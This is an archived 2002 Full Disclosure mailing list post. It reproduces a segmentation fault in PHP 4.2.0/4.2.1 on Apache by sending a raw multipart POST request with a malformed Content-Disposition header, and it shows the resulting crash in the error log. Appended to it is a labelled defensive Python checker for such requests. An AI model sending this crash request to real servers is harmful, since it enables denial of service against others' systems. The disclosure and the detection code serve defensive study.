Full Disclosure mailing list archives

How to reproduce PHP segfault.
From: full-disclosure () lists netsys com (Joseph S. Testa II)
Date: Wed, 24 Jul 2002 10:28:49 -0400

Happy Wednesday.

     The following is an example of how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog () wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

-----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
-----------------------------123--

Connection closed by foreign host.
[jdog () wonderland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)
[jdog () wonderland logs]$


     Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


     - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4
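
Added example, not part of the original post and not PHP or Apache code: a defender-side Python check that flags multipart/form-data parts whose Content-Disposition header is not of type form-data with a name parameter (as RFC 7578 requires), and that pulls signalled-child entries out of an Apache error_log. The function names, the sample bodies and the boundary length are constructed for illustration.

```python
import re

# Apache 1.3 error_log entry for a child killed by a signal, as quoted in the post.
CHILD_SIGNAL = re.compile(r"\[notice\] child pid (\d+) exit signal (.+?) \((\d+)\)")
# One ";name=value" parameter; a quoted value may contain ";" without splitting.
PARAM = re.compile(r';\s*([^\s=;]+)\s*=\s*("(?:[^"\\]|\\.)*"|[^;]*)')

def crashed_children(log_text):
    """Return (pid, signal name, signal number) for each signalled child."""
    return [(int(p), s, int(n)) for p, s, n in CHILD_SIGNAL.findall(log_text)]

def check_parts(content_type, body):
    """Return (part index, problem) pairs for parts that break RFC 7578."""
    m = re.search(r'boundary="?([^";]+)"?', content_type, re.I)
    if m is None:
        return [(0, "no boundary parameter")]
    problems = []
    chunks = body.split(b"--" + m.group(1).encode("latin-1"))
    for i, chunk in enumerate(chunks[1:], start=1):
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        # Drop the rest of the delimiter line; an immediate blank line means no headers.
        text = chunk.decode("latin-1").replace("\r\n", "\n").partition("\n")[2]
        head = "" if text.startswith("\n") else text.split("\n\n", 1)[0]
        headers = {}
        for line in head.split("\n"):
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        disp = headers.get("content-disposition")
        if disp is None:
            problems.append((i, "missing Content-Disposition"))
            continue
        if disp.split(";", 1)[0].strip().lower() != "form-data":
            problems.append((i, "disposition type is not form-data"))
        if "name" not in {k.lower() for k, _ in PARAM.findall(disp)}:
            problems.append((i, "no name parameter"))
    return problems

# Constructed samples shaped like the request and the log line in the post.
BOUNDARY = "-" * 27 + "123"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY
def part(disposition):
    return ("--%s\r\nContent-Disposition: %s\r\n\r\nvalue\r\n--%s--\r\n"
            % (BOUNDARY, disposition, BOUNDARY)).encode("latin-1")
MALFORMED = part("filename")
WELL_FORMED = part('form-data; name="f"; filename="a;name=b.txt"')
LOG = "[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)\n"
if __name__ == "__main__":
    print(check_parts(CTYPE, MALFORMED), crashed_children(LOG))
```

A check like this belongs in front of the interpreter (reverse proxy or request filter), so a malformed part is rejected before the multipart parser sees it.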




